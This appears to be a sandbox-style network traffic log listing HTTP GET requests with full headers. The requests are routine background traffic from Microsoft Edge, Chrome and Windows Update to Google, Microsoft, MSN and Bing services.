Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZHYzBU9XXRw5tHv&MD=5C6y4ED8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /config/v1/Edge/117.0.2045.47?clientId=-5438092865908489856&agents=Edge%2CEdgeConfig%2CEdgeServices%2CEdgeFirstRun%2CEdgeFirstRunConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfull=0&scpguard=0&scpfre=0&scpver=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=5&mngd=0&installdate=1696493841&edu=0&bphint=2&soobedate=1696493837&fg=1 HTTP/1.1Host: config.edge.skype.comConnection: keep-aliveIf-None-Match: "h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="Accept-Encoding: gzipSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733137725&P2=404&P3=2&P4=BLlaGljRHDfvzL9BLm2TqzGBzejuet5KAiIOgo%2fpnXSJlO2jVdpJQ03ndK0K0V9JfX%2bSg0PV%2fKbdk6q%2fXbP72A%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: +3XNT+gxoElKTS96nBL3E6Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /extensionwebstorebase/v1/logextensionreliability?success=true&cv=+3XNT+gxoElKTS96nBL3E6&errorString=&crxId=jmjflgjpcpepeafmmgdpfkogkghcpiha&os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=edgecrx&prodchannel=&prodversion=117.0.2045.47&lang=en-GB&acceptformat=crx3,puff HTTP/1.1Host: edge.microsoft.comConnection: keep-aliveScenario: UpdateSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, br
Source: global traffic HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0A576580DC7A6D0124D170C2DDEE6CAA; _EDGE_S=F=1&SID=1E9460D0D047688427CB7592D1A5693C; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1732532933075&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=354610ce91cb4454a7edd3a26242369f&activityId=354610ce91cb4454a7edd3a26242369f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0A576580DC7A6D0124D170C2DDEE6CAA; _EDGE_S=F=1&SID=1E9460D0D047688427CB7592D1A5693C; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /b?rn=1732532933075&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0A576580DC7A6D0124D170C2DDEE6CAA&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1732532933075&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=354610ce91cb4454a7edd3a26242369f&activityId=354610ce91cb4454a7edd3a26242369f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=81A7AD75DE404C4D9504966CD607D61E&RedC=c.msn.com&MXFR=0A576580DC7A6D0124D170C2DDEE6CAA HTTP/1.1Host: c.bing.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-MS-GEC: F9627686C11DD26947419672002C024C912A715D4C4C02478118D8F6D0548C15Sec-MS-GEC-Version: 1-117.0.2045.47Referer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":16,"provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=354610CE91CB4454A7EDD3A26242369F.RefC=2024-11-25T11:08:41Z; USRLOC=; MUID=0A576580DC7A6D0124D170C2DDEE6CAA; MUIDB=0A576580DC7A6D0124D170C2DDEE6CAA; _EDGE_S=F=1&SID=1E9460D0D047688427CB7592D1A5693C; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=de34173b-fe96-4429-96a0-2bd098790f4d; ai_session=It58WRYGMta7xZuGvi5tuj|1732532933071|1732532933071; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=354610CE91CB4454A7EDD3A26242369F.RefC=2024-11-25T11:08:41Z
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.4sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 650sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=354610CE91CB4454A7EDD3A26242369F.RefC=2024-11-25T11:08:41Z; USRLOC=; MUID=0A576580DC7A6D0124D170C2DDEE6CAA; MUIDB=0A576580DC7A6D0124D170C2DDEE6CAA; _EDGE_S=F=1&SID=1E9460D0D047688427CB7592D1A5693C; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=de34173b-fe96-4429-96a0-2bd098790f4d; ai_session=It58WRYGMta7xZuGvi5tuj|1732532933071|1732532933071; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=354610CE91CB4454A7EDD3A26242369F.RefC=2024-11-25T11:08:41Z
Source: global traffic HTTP traffic detected: GET /b2?rn=1732532933075&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0A576580DC7A6D0124D170C2DDEE6CAA&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1C296e1bec5e46dcb1708fc1732532934; XID=1C296e1bec5e46dcb1708fc1732532934
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
